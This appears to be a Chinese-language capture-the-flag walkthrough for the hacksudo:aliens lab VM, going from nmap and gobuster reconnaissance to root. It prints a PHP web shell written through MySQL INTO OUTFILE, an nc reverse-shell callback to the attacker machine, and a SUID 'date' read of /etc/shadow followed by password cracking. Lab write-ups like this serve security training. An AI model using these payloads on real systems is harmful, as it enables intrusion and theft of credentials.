Hacksudo Aliens

Hacksudo:Aliens

一、基本信息

名称:hacksudo:aliens

发布日期:2021.4.4

作者:Vishal Waghmare

系列:hacksudo

二、靶机简介

Flags:

root:/root/root.txt

难度:中等

三、文件信息

文件名:HacksudoAliens.zip

文件大小:2.3GB

下载地址:

MD5: DEFA809B70DADCC72011AAFBB03D1FF6

SHA1: 6E68D6D06692D2C3ACBC1E1C3AEA271A226CD24D

四、镜像信息

格式:Virtual Machine (Virtualbox - OVA)

操作系统:Linux(debain)

五、网络信息

DHCP服务:可用

IP地址:自动分配

六、环境配置

1.将靶机Aliens和攻击机kali2021在VirtualBox下设置为仅主机模式,使用DHCP分配ip地址:

image-

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的,所以要先进行主机探测,先查看下kali分配到的ip,在进行网段扫描,命令如下,得到靶机ip为192.168.56.102:

1
ifconfig,查看kali分配到的ip

image-

1
nmap -sP 192.168.56.0/24,扫描靶机ip

image-

2.再进行端口扫描,发现开放22,80,9000端口,访问主页,源码内有没有过多提示:

1
nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.110 | tee nmapscan,端口扫描

image-

image-

3.最后再进行一下目录扫描,两个目录,访问/backup目录,下面mysql.bak文件内有用户和密码:

1
gobuster dir -u http://192.168.56.110/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,目录扫描

image-

image-

image-

登录phpadmin,写入shell

1.因为端口扫描到了9000端口是phpadmin的服务,利用刚才mysql.bak内的账号密码可成功登录:

image-

2.可以查看secure_file_priv的值为空,mysql可读可写,可以先用一句话php木马尝试,这里直接写入shell,在kali同步开启监听:

1
SHOW VARIABLES LIKE "secure_file_priv";

image-

1
SELECT “<?php system($_GET[‘cmd’]);?>” INTO OUTFILE “/var/www/html/alien.php”,一句话木马

image-

1
http://192.168.56.110/alien.php?cmd=nc%20192.168.56.102%20%208989%20%20-e%20/bin/bash,浏览器输入payload,kali同步开启8989端口监听

image-

root权限文件查询,准备提权

1.查找具有root权限的suid文件,进行suid提权:

1
find / -perm -u=s -type f 2>/dev/null

image-

2.访问https://gtfobins.github.io/,对查到的内容进行比对尝试提权:

image-

1
2
LFILE=/etc/shadow
date -f $LFILE

image-

3.很明显得到的数据是hacksudo及其密码,将字符串拷贝到alien.txt,我们利用john对其解密:

image-

root提权

1.进入hacksudo用户,再次查看具有root权限的suid文件,尝试提权:

image-

2.查询到cpulimit文件,再去https://gtfobins.github.io/查询提权方式:

image-

image-

3.成功登录root用户,在/root目录下发现flag,root.txt:

image-